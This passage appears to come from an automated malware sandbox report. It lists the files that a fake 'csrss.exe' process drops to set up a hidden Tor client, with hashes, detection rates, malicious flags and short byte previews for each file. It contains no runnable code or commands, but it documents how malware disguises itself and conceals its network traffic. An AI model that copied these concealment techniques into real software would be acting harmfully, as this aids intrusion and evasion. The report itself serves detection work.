                                                          SHA1:F7ABDD7779272EEEDA371CAA52CFC5BA3B608C84
                                                          SHA-256:21F7A32152D87672649F15F5EFDE5D0F6DFC00763DDC19486CF4178D1B642F65
                                                          SHA-512:218473CAE7B8E0F011DF46863409772F9DB87283C91E2CFF52FEE9365230BE87AD040EE031F002F91262F8FD69B66DB3BBDC97F20B8F90162B88CAEF0919AE69
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........p...............5.........p........0g...@...........................r...........@...................................n...............................n..................................................... 0g..............................text...o.5.......5.................`..`.rdata..<-1...6...1...5.............@..@.data... S...0g......"g.............@....idata........n......&l.............@....reloc........n......*l.............@..B.symtab.......r.......p................B................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Data\Tor\geoip

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):3987500
                                                          Entropy (8bit):4.0110114531289485
                                                          Encrypted:false
                                                          SSDEEP:49152:DafG4adBZfUJczDMlXCbuxCCAjnk+AS3IDTN5v6iuXTvz:J
                                                          MD5:C72911DEC6AE8C4BC62BB2A6A21BA85B
                                                          SHA1:0AE7077313A53103C2B32100D74AAFC04216289D
                                                          SHA-256:7E777EFC194EA9788171636085B19875D19397D3249FBB88136534037A3DC38F
                                                          SHA-512:99DC9761AD69F5508D96A2362B930728D451F5DDCF7BB1E210EC5B0F14EE00EE71EFAAAB150FFA16A2F92FBBB1E2A6B5CD92D51721996DF7AC794491C441C304
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Tue, 09 Aug 2022 06:11:25 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.16777216,16777471,AU.16777472,16778239,CN.16778240,16779263,AU.16779264,16781311,CN.16781312,16785407,JP.16785408,16793599,CN.16793600,16809983,JP.16809984,16842751,TH.16842752,16843007,CN.16843008,16843263,AU.16843264,16859135,CN.16859136,16875519,JP.16875520,16908287,TH.16908288,16909055,CN.16909056,16909311,AU.16909312,16941055,CN.16941056,16973823,TH.16973824,17039359,CN.17039360,17039615,AU.17039616,17072127,CN.17072128,17104895,TH.17104896,17170431,JP.17170432,17301503,IN.17301504,17367039

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Data\Tor\geoip6

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):5919292
                                                          Entropy (8bit):3.1083240413253934
                                                          Encrypted:false
                                                          SSDEEP:24576:OSVA+ByKCLUCVEPycvUlmx0oLPTvmCg1e1GSxD80xmSLpjLrnMLTjnTzP7HxLfz3:Y
                                                          MD5:ED2F9B19DD1584D7E26F5BA460EF2FBF
                                                          SHA1:DCBF1789BF1EEB03276B830CB2AB92BCF779D97F
                                                          SHA-256:F11BD1D7546CAD00B6DB0A1594F3AC1DAF9F541004FD7EFB5414E068693D6ADD
                                                          SHA-512:DCFC780D1E34968390969B64EA2091B630C8EEC94AC4724A4103A003A2F31545C3791A39F514517153538B4D3F5C50B6BFBA74CC9CF8C0B1B5DABA0A4849C856
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Tue, 09 Aug 2022 06:11:25 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.2001::,2001:0:ffff:ffff:ffff:ffff:ffff:ffff,??.2001:4:112::,2001:4:112:ffff:ffff:ffff:ffff:ffff,??.2001:200::,2001:200:134:ffff:ffff:ffff:ffff:ffff,JP.2001:200:135::,2001:200:135:ffff:ffff:ffff:ffff:ffff,US.2001:200:136::,2001:200:179:ffff:ffff:ffff:ffff:ffff,JP.2001:200:17a::,2001:200:17b:ffff:ffff:ffff:ffff:ffff,US.2001:200:17c::,2001:200:ffff:ffff:ffff:ffff:ffff:ffff,JP.2001:201::,2001:207:ffff:ffff:ffff:ffff:ffff:ffff,AU.2001:208::,2001:208:ffff:ffff:ffff:ffff:ffff:ffff,SG.2001:209::,2001:21

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\cached-certs (copy)

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):14018
                                                          Entropy (8bit):6.052487508143452
                                                          Encrypted:false
                                                          SSDEEP:384:4U4IoVM1h8t//4DVEl1hnnd4oGbVla1hQfy2h4YVc1h162q41o8XVKu1h9byd24r:1wyCnyKDd1ImOy6xyhCM3hb62M1uk
                                                          MD5:70BC31E2A64CD5707571C28522621E5A
                                                          SHA1:2C742BEBCFB5C9BA24BECD6F5306FD6D55F743B4
                                                          SHA-256:B8147B79C685D063DC1866EF9396EFF64AB27DE8FAAE91D79129945F7A4A0874
                                                          SHA-512:31B6F78FF065A86D90538A51C83DD9BECF47C6BF9932EB0640511A41922ED729B4F9BB1BC034E65B895FD147A21C3A8E9BFBB6B9B4C36D0B8D2F6583FBEEECB2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:dir-key-certificate-version 3..fingerprint 49015F787433103580E3B66A1707A00E60F2D15B..dir-key-published 2023-04-05 17:47:59..dir-key-expires 2023-07-05 17:47:59..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAxVbS0noZKz1Ei6858RGyyuQgwQUKG4Urrp2BiAzkYxwX+6fURlut..AjeLb4XysqCdNdUipuLRQ2QIy1C220QiCHV6jZAsM4tmEq6TpK6q1lxi5YPKqbGS..CfUQFT1nO4s4DCYSLCwiRNy6bMe8tNHc0MpXP3loCbPkYCoXrEL6vYIROw3oeGWE..KbFPQrzYJAPHgUubBibsY5lkUY9N/5QZw2y1bn+dq9mFOoCIHLd6DkQmySmftnMe..QrpYA2WvE4M5yN2HB8QGT7TdzXPPL6889rFw/mjqYExQPX7cqmILkchsB7I5whjA..u0oodF8Y9ooK9QT0GeK4h3xQhzNG17anuUxbZ7sxzmBwBNmkNyLWEeIntazyjRFr..P2mDY/9YK2JOQKkh3tKl1whcCG9ZtAhKmm/ijG7OrhqtusdGKBXIgALf4f111AK1..gNcacDx2fJzRHuNK8zkIORAzStxKdLbAbBNeLENk1zBjSkrxCOJH4mBpr8TXULq1..ThLI/8OzZq4LAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvv0TXkvzn4wlk6zF5qvalq3Qt0s3Uj4N6AqDRiX4ouPR3u64ZKvO..V0po5LKo1NiqFsHQW5U64SVYpG6z6QkG0dzCXGyOrm0FVlTA4OE2UErBkjzwRpMZ..wCyTRunJ1wfPNsptuV6zqVWijDwY

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\cached-certs.tmp

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):14018
                                                          Entropy (8bit):6.052487508143452
                                                          Encrypted:false
                                                          SSDEEP:384:4U4IoVM1h8t//4DVEl1hnnd4oGbVla1hQfy2h4YVc1h162q41o8XVKu1h9byd24r:1wyCnyKDd1ImOy6xyhCM3hb62M1uk
                                                          MD5:70BC31E2A64CD5707571C28522621E5A
                                                          SHA1:2C742BEBCFB5C9BA24BECD6F5306FD6D55F743B4
                                                          SHA-256:B8147B79C685D063DC1866EF9396EFF64AB27DE8FAAE91D79129945F7A4A0874
                                                          SHA-512:31B6F78FF065A86D90538A51C83DD9BECF47C6BF9932EB0640511A41922ED729B4F9BB1BC034E65B895FD147A21C3A8E9BFBB6B9B4C36D0B8D2F6583FBEEECB2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:dir-key-certificate-version 3..fingerprint 49015F787433103580E3B66A1707A00E60F2D15B..dir-key-published 2023-04-05 17:47:59..dir-key-expires 2023-07-05 17:47:59..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAxVbS0noZKz1Ei6858RGyyuQgwQUKG4Urrp2BiAzkYxwX+6fURlut..AjeLb4XysqCdNdUipuLRQ2QIy1C220QiCHV6jZAsM4tmEq6TpK6q1lxi5YPKqbGS..CfUQFT1nO4s4DCYSLCwiRNy6bMe8tNHc0MpXP3loCbPkYCoXrEL6vYIROw3oeGWE..KbFPQrzYJAPHgUubBibsY5lkUY9N/5QZw2y1bn+dq9mFOoCIHLd6DkQmySmftnMe..QrpYA2WvE4M5yN2HB8QGT7TdzXPPL6889rFw/mjqYExQPX7cqmILkchsB7I5whjA..u0oodF8Y9ooK9QT0GeK4h3xQhzNG17anuUxbZ7sxzmBwBNmkNyLWEeIntazyjRFr..P2mDY/9YK2JOQKkh3tKl1whcCG9ZtAhKmm/ijG7OrhqtusdGKBXIgALf4f111AK1..gNcacDx2fJzRHuNK8zkIORAzStxKdLbAbBNeLENk1zBjSkrxCOJH4mBpr8TXULq1..ThLI/8OzZq4LAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvv0TXkvzn4wlk6zF5qvalq3Qt0s3Uj4N6AqDRiX4ouPR3u64ZKvO..V0po5LKo1NiqFsHQW5U64SVYpG6z6QkG0dzCXGyOrm0FVlTA4OE2UErBkjzwRpMZ..wCyTRunJ1wfPNsptuV6zqVWijDwY

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\cached-microdesc-consensus (copy)

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (951)
                                                          Category:dropped
                                                          Size (bytes):2335545
                                                          Entropy (8bit):5.633016644635129
                                                          Encrypted:false
                                                          SSDEEP:12288:35scsA2FGSV9VK+UJFoX1HibnIwOt97mTNILhz9qL/COg5zI3dWbbA:3i3AGG4IWSIVt5mTShzuwz4dAA
                                                          MD5:B5F4106F219FC01DA4EE443BC0007878
                                                          SHA1:A29E63438405C75BFEC31E51F67260EF2E801077
                                                          SHA-256:788006221BF575E6ED466BA0C925C88FB88BAB955D22013864D72E3E2BAFFE61
                                                          SHA-512:18D22839BA0370BD39B4875C86A105DA4DE4449217FD335CE65C6BC217DB6E22814ACA4CE8DF77578651AFCE0EEA5B9B12A0A66FB6F3F6220FF2C737D7ED02FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 32.valid-after 2023-05-28 09:00:00.fresh-until 2023-05-28 10:00:00.valid-until 2023-05-28 12:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCreationEnabled=1 DoSCircuitCreationMinConnections=2 DoSCi

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\cached-microdesc-consensus.tmp

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (951)
                                                          Category:dropped
                                                          Size (bytes):2335545
                                                          Entropy (8bit):5.633016644635129
                                                          Encrypted:false
                                                          SSDEEP:12288:35scsA2FGSV9VK+UJFoX1HibnIwOt97mTNILhz9qL/COg5zI3dWbbA:3i3AGG4IWSIVt5mTShzuwz4dAA
                                                          MD5:B5F4106F219FC01DA4EE443BC0007878
                                                          SHA1:A29E63438405C75BFEC31E51F67260EF2E801077
                                                          SHA-256:788006221BF575E6ED466BA0C925C88FB88BAB955D22013864D72E3E2BAFFE61
                                                          SHA-512:18D22839BA0370BD39B4875C86A105DA4DE4449217FD335CE65C6BC217DB6E22814ACA4CE8DF77578651AFCE0EEA5B9B12A0A66FB6F3F6220FF2C737D7ED02FF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 32.valid-after 2023-05-28 09:00:00.fresh-until 2023-05-28 10:00:00.valid-until 2023-05-28 12:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCreationEnabled=1 DoSCircuitCreationMinConnections=2 DoSCi

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\cached-microdescs.new

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          File Type:ASCII text, with very long lines (9078)
                                                          Category:dropped
                                                          Size (bytes):14009460
                                                          Entropy (8bit):4.9630162100579
                                                          Encrypted:false
                                                          SSDEEP:24576:2QhTBG1rutAkXxYtxXsw1VrNeyaeB/GU9LUr3+sw2jc/PmYcv6vxZsvwsuwymW1I:+7sNRqdDlMw3PLYMktWMqnnA
                                                          MD5:700CA6B4D8E515BCCAC9066168B896B4
                                                          SHA1:0ACCB17CAE34051830682C1175F25115DC77E280
                                                          SHA-256:9EA0A094EB06B77DD6F27F912F4C4A165177A381FA23BA402559CC92DF1BB737
                                                          SHA-512:CBDC8837284EF8157F91EA69AF9DEC689D68171F813BAEB584CE1E6421B735254ED71F31A67AB2821F4725FC6465B947D599309D137C3EC8E72C9421BBBEAEF9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:@last-listed 2023-05-28 10:32:24.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBALwsq0GmRyaUh05wWhds0hTmgRlpGGMQssrYiZraMv27duNoe1zHgDfF.HyRB/AwyzrUdcAPe6Fzn3wm6g/gMFeLMnDuiNLygrEKCACpgxc87wKSZD9GjmPYk.czZZnWnkrMgDLxZDs1vzgVBPSxVgUGclmzGiFTJ2XbqSTRTfKbVXAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key o9raTUkJ9UbJD+Grd3A1L08RP6eveXOXpavhJTrWt2Q.id ed25519 sMwKMpHEKTtQvxL9pNqpHDkvhsBdDZ76CiOENchaQ6g.@last-listed 2023-05-28 10:32:24.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBALKcnlrLGm0XstKznRPb9LAdE5WdvvdkG+q6X60MK+y/FYGS1O3b5uUz.ppqlqZQRtzG0/rqks57Z9JUIpV8SV7ne3Bpjx1KwJrc1tRUCYcl7O0/8evq4i6iQ.8z37Afet5Ezm+eu7KKNXa/Dq1F9fo7iaFS0JMkqHBPSfEocIfqcpAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key lKXFiK86hTe2lG5JSu9sxs9sccv227DVAlU/9fi1pWc.id ed25519 cpqJBuuDju7s2R8Z+iJrjHkEFQviOzXmW0h252gOTXc.@last-listed 2023-05-28 10:32:24.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAKhDKfsb7jTbu63Z6nEKy80CQsjel1fD38vN/GxJj5KwgMHaNR2lA4v+.KjHp/obU3PhMcwOB0hzjRWdSe7gH5niew3hi8QiP/qrKd

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\geoip (copy)

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):3987500
                                                          Entropy (8bit):4.0110114531289485
                                                          Encrypted:false
                                                          SSDEEP:49152:DafG4adBZfUJczDMlXCbuxCCAjnk+AS3IDTN5v6iuXTvz:J
                                                          MD5:C72911DEC6AE8C4BC62BB2A6A21BA85B
                                                          SHA1:0AE7077313A53103C2B32100D74AAFC04216289D
                                                          SHA-256:7E777EFC194EA9788171636085B19875D19397D3249FBB88136534037A3DC38F
                                                          SHA-512:99DC9761AD69F5508D96A2362B930728D451F5DDCF7BB1E210EC5B0F14EE00EE71EFAAAB150FFA16A2F92FBBB1E2A6B5CD92D51721996DF7AC794491C441C304
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Tue, 09 Aug 2022 06:11:25 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.16777216,16777471,AU.16777472,16778239,CN.16778240,16779263,AU.16779264,16781311,CN.16781312,16785407,JP.16785408,16793599,CN.16793600,16809983,JP.16809984,16842751,TH.16842752,16843007,CN.16843008,16843263,AU.16843264,16859135,CN.16859136,16875519,JP.16875520,16908287,TH.16908288,16909055,CN.16909056,16909311,AU.16909312,16941055,CN.16941056,16973823,TH.16973824,17039359,CN.17039360,17039615,AU.17039616,17072127,CN.17072128,17104895,TH.17104896,17170431,JP.17170432,17301503,IN.17301504,17367039

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\geoip6 (copy)

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):5919292
                                                          Entropy (8bit):3.1083240413253934
                                                          Encrypted:false
                                                          SSDEEP:24576:OSVA+ByKCLUCVEPycvUlmx0oLPTvmCg1e1GSxD80xmSLpjLrnMLTjnTzP7HxLfz3:Y
                                                          MD5:ED2F9B19DD1584D7E26F5BA460EF2FBF
                                                          SHA1:DCBF1789BF1EEB03276B830CB2AB92BCF779D97F
                                                          SHA-256:F11BD1D7546CAD00B6DB0A1594F3AC1DAF9F541004FD7EFB5414E068693D6ADD
                                                          SHA-512:DCFC780D1E34968390969B64EA2091B630C8EEC94AC4724A4103A003A2F31545C3791A39F514517153538B4D3F5C50B6BFBA74CC9CF8C0B1B5DABA0A4849C856
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Tue, 09 Aug 2022 06:11:25 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.2001::,2001:0:ffff:ffff:ffff:ffff:ffff:ffff,??.2001:4:112::,2001:4:112:ffff:ffff:ffff:ffff:ffff,??.2001:200::,2001:200:134:ffff:ffff:ffff:ffff:ffff,JP.2001:200:135::,2001:200:135:ffff:ffff:ffff:ffff:ffff,US.2001:200:136::,2001:200:179:ffff:ffff:ffff:ffff:ffff,JP.2001:200:17a::,2001:200:17b:ffff:ffff:ffff:ffff:ffff,US.2001:200:17c::,2001:200:ffff:ffff:ffff:ffff:ffff:ffff,JP.2001:201::,2001:207:ffff:ffff:ffff:ffff:ffff:ffff,AU.2001:208::,2001:208:ffff:ffff:ffff:ffff:ffff:ffff,SG.2001:209::,2001:21

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libcrypto-1_1.dll

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3720943
                                                          Entropy (8bit):6.381273721170494
                                                          Encrypted:false
                                                          SSDEEP:98304:hxRZU5tRdTvnt3EhOPE2sgEcgY5PJbBC87I8wpi1CPwDv3uFfJxzX2EeJUO9WL44:XzUJhvnt3EhOP/srcN5PJbBD7TIi1CP3
                                                          MD5:B7C32C8E7D21AA9B79470037227EBA43
                                                          SHA1:38D719B10CA035CEE65162C1A44E2C62123D41B4
                                                          SHA-256:99B4042A858A9E437917C8256692E9BA161B87054CCF5E22538E86BB35C34F23
                                                          SHA-512:D85345380B9605C8484E11873218AA4EAEEA573CA51EEDADA6D0518695A2B184BB22FAF7C5E3D88330935774CED17E9D80C577B06603AA1CA6DAB748B0BD15A7
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........(/..\.....!...#......*..B................@k..........................0......Y9...@... .......................(.......*.$....P*......................`*.............................l.".....................H.*..............................text...h...........................`..`.data...............................@.`..rdata..hS.......T..................@.`@/4......XX...P#..Z...D#.............@.0@.bss.....A....'.......................`..edata........(.......'.............@.0@.idata..$.....*.......).............@.0..CRT....,....0*.......).............@.0..tls.........@*.......).............@.0..rsrc........P*.......).............@.0..reloc.......`*.......).............@.0B/14..........P+.......*.............@.@B/29.....g....`+.......*.............@..B/41......F....,..H...>,.............@..B/55..........@-.......,.............@..B/67.....8....0.......n-.

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent-2-1-7.dll

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):897308
                                                          Entropy (8bit):6.070043579095594
                                                          Encrypted:false
                                                          SSDEEP:12288:q1db6bzbHbMZFbhb0bvb64AZI6lHkzptOAL2Wt4XCFDsF/Jpt7L7ZG1nkC0xuHSC:+4AZ0zrOAL2M4XvF/tI7HS4P
                                                          MD5:736443B08B5A52B6958F001E8200BE71
                                                          SHA1:E56DDC8476AEF0D3482C99C5BFAF0F57458B2576
                                                          SHA-256:DA1F75B9CE5F47CB78A6930A50C08397EE4D9778302746340F4057FCD838DBF4
                                                          SHA-512:9DFCDB1186B089E7961767D427DE986AD8E5F7715B7592984349D0B8E7F02198137C83E8C79A096A7475AD9F4695F52539FA08FA65912860DDF0A85515A7CDA1
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........N.........!...#......... .................h......................................@... ..........................Y......T............................ ...&...........................z......................P................................text...............................`.P`.data...............................@.`..rdata..............................@.`@/4......L............z..............@.0@.bss.........`........................`..edata...Y.......Z...6..............@.0@.idata..T...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc...&... ...(..................@.0B/14..........P......................@.@B/29..........`......................@..B/41.....{I.......J...r..............@..B/55.....)....P......................@..B/67.....8....@......................@.0B/80.....e....P..........

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_core-2-1-7.dll

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):718110
                                                          Entropy (8bit):5.9917560981929405
                                                          Encrypted:false
                                                          SSDEEP:12288:iW3bb6bRbHbIZJbhbgbvb5m1A73b/0kPxuPL32s4tijTHK2jtki943eAWnVC1uLx:im1A73b/0kPxuPL32LMvHHtkcMtwv
                                                          MD5:F1BCC8BD3200845993211EB807F33E56
                                                          SHA1:D25274E36E79D8E50A446B1144D8B6F2B2CF309B
                                                          SHA-256:7CD199BBF3BFE19182C5ECA3A080A7E93CEC0D30CBD872A305C92BC9282A7399
                                                          SHA-512:397BA6B995AEBCE54B95C7F3ABD3C64AE2C5AB3D01FB38185F8FCCAD82CAC335E2F0666FC47B73D3A3A4AF9B5A5CE311E4963841616F4D38B03E1BC16355B5BB
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........p......!...#.V...................p....0n.................................`....@... .........................i<..............................................................................................L............................text....T.......V..................`.P`.data........p.......\..............@.`..rdata...V.......X...`..............@.`@/4..................................@.0@.bss.........p........................`..edata..i<.......>...<..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B/14.......... ......................@.@B/29.....W....0......................@..B/41......G.......H...F..............@..B/55.......... ......................@..B/67.....8............v..............@.0B/80.....[.... .......x..

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_extra-2-1-7.dll

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):509893
                                                          Entropy (8bit):5.923804968499278
                                                          Encrypted:false
                                                          SSDEEP:12288:99tor7gVS5W5rHNYOXB1XEtrfI8Vu1nmCuXZS:vV2W5rHuO0tuyZS
                                                          MD5:F963552B851FDE3834405BB98BAE0C36
                                                          SHA1:822C7D7988AC28ACA080DBC9C26F98416F67124F
                                                          SHA-256:36C66CFC6E9663BDD2CDC54A1253A8C26C837CA0BD8C52769B5820641C18D4C3
                                                          SHA-512:B301DF8740E07C1032E959E563842D568916F7165F72C459C0FFCBE1A717B0886BE1D2EF8B992875392A09983AE9E35E7481B29C213A18EE15B335A9849CF39B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........R.........!...#.*...................@.....d.................................3....@... .............................. ..`............................`...............................~.......................#...............................text....(.......*..................`.P`.data...4....@.......0..............@.`..rdata...A...P...B...2..............@.`@/4.......K.......L...t..............@.0@.bss....P.............................`..edata........... ..................@.0@.idata..`.... ......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B/14.....P...........................@.@B/29......).......*..................@..B/41.....h4.......6...@..............@..B/55.....k............v..............@..B/67.....8...........................@.0B/80.....F...............

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libgcc_s_dw2-1.dll

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):684853
                                                          Entropy (8bit):5.811518800721527
                                                          Encrypted:false
                                                          SSDEEP:6144:X8lWUP47MlXxv9XQh2ACuBs4Npf4XCdzNe/+Qg3K2tUzVprtk4kpQANYErfxAdba:X8lWUOUhp4Df8CdzNAlacpmpxTxOno3/
                                                          MD5:36E1C3814BDE3418BA3D38517954CB7C
                                                          SHA1:495E1BA5B0B442E70124D33DAA6FEA4E3E5931B0
                                                          SHA-256:B34EDD252F46DD881E79CFD274777FE5E90943D511C8E002AECA0528D7F3B4B1
                                                          SHA-512:DF7B608C51A782AD5CDFD753577A3DCACF4E2515AC02CE9E35B3CBC543895862844E8ADCAFF983B1348884085CF7427C33A67ACC5CE48FE656F5B2083D0813B0
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........L.........!...#.d.........................n................................X.....@... .........................u.......x............................@.......................................................................................text....b.......d..................`.P`.data...(............j..............@.0..rdata...............l..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x...........................@.0..CRT....,.... ......................@.0..tls.........0......................@.0..reloc.......@......................@.0B/14.....h....P......................@.@B/29..........`......................@..B/41......w...@...x..................@..B/55......\.......^...:..............@..B/67.....d.... ......................@.0B/80..........0..........

                                                          C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libssl-1_1.dll

                                                          Download File
                                                          Process:C:\Windows\rss\csrss.exe
